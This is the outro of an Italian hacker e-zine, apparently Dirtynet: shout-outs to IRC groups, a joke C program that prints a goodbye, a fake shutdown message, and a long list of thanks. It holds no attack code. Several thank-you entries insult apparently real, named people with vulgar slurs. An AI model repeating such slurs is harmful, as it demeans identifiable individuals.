Goony,Scire,Sulex,Floppino,Grungio,Fratak,McGiver,AntiS,gouranga,LizDay,satz,cancerman,Dea,ULCC,
Ice'St0rm e tutti quelli che ho dimenticato di #phreak.it(scusatemi). Poi saluto anche tutti quelli dei
tamkcommandos,della hrn,pbk,Maphias0ft,gli Spippolatori,in particolare il grande Master,Chrome,
Brigante,RigorMortem,e tutti quelli che mi vogliono bene :)
Fuck to: MMMMM un gran vaffanculo all'amicizia fra ragazzi e ragazze!!!!!!
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
bash# cat end.c
#include <stdio.h>
main(){
printf("Anche per oggi è tutto dal vostro SPYRO\n");
printf("Ciaoooooooooooo\n");
}
bash# halt
ATTENDERE:ARRESTO DEL SISTEMA IN CORSO......
ORA SI PUO' SPEGNERE IL COMPUTER!
ahahaha scherzo ;)
/===========================::=============================::=================/
/ /Outro / A[v]a[t]A[r] /
/===========================::=============================::=================/
Ragazzi anche questo numero di Dn è finito ed ora non mi resta altro che salutarvi.
Poi cerchero' di fare qualche altra cosa, molto difficile visto chè fuori piove e molti dei miei
amici sono partiti per trascorrere le tante attese feste pasquali.
Ringrazio syn che ha collaborato con me e tutti quelli che hanno letto Dirtynet
fino in fondo.
Non vi preoccupate per me sicuramente trovero' qualcosa da fare anzi lo sapete cosa vi dico
ora mi vado a preparare un bel cubalibre e poi inizio a fare i rosari su Marilyn Manson!!!
Questa non la ho detta io e stato syn......
Ringraziamenti e saluti
Method man (frato di sYn)
Avatar
Giada
Carminuccio
Gollo
Scafuto
Scafuti Chip
sKAM
smav
Immacolata
Nicoli'
Marilyn Manson
Papa Roach
all mumy
Angelocattivo
#buonavolonta
Linux
Armando
Costantino
Gigi D'Ag
Gennaro
Cherubbino
Capucchion
Pecuron (Agnello)
Gei rasc' (Jrash)
Leo il colombiano
Zi' Pepp
Capa Rezza !
Carletto
Cristiano & l'animale
Winning eleven !
Dj time
Claudia Shiffer !
Frezzolino o bread
camelot
Tank commandos crew
Fons' a patan'
Perrotta prrrrrr
Ivan il terribile !
Maradona
Il berretto di Armando
Il gsm di ava con sopra il logo di Hackersat.com !
Norma
Vittoria la zoccola
Nigeria
Pinturicchio
Babangida !
MinM
Salernitana
Il Cosentino
Pantuliano la stronza
fontanella
syn's guitar
Nello
Rutelli
Di Biase
Scevcenko
Batistuta
SPYRO
Spencer
Bove prof.ssa di syn !
pagnotta
Blinky
NCKxxx
Chiunque voglia collaborare , puo' sempre inviare i propi art a "syn@hackersat.com";
è chiaro saranno valutati prima. CMQ siete tutti ben accetti.
Chi non ama troppo, non ama abbastanza.